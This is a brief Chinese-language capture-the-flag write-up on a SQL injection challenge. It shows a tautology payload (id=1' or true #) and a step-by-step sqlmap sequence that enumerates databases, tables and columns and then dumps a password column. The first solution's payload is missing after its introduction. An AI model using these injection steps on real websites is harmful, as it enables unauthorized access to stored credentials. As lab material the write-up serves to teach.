查看网页
很明显,他是要我们输入id
这里我尝试了直接爆破,没有成功
解法一(用万能密码):
payload如下:
我这里还尝试了id=1' or true # 没有成功,应该是题目把#给过滤了
解法二:
用sqlmap工具
用法:
-D 选择数据库
-T 选择表
-C 选择列
--tables 列出所有表
--columns 列出所有列
--dump 打印出数据
依次输入
sqlmap -u "网页地址?id=1" --dbs
sqlmap -u "网页地址?id=1" -D cyber --tables
sqlmap -u "网页地址?id=1" -D cyber -T cyber --columns
sqlmap -u "网页地址?id=1" -D cyber -T cyber -C pw --dump
如图
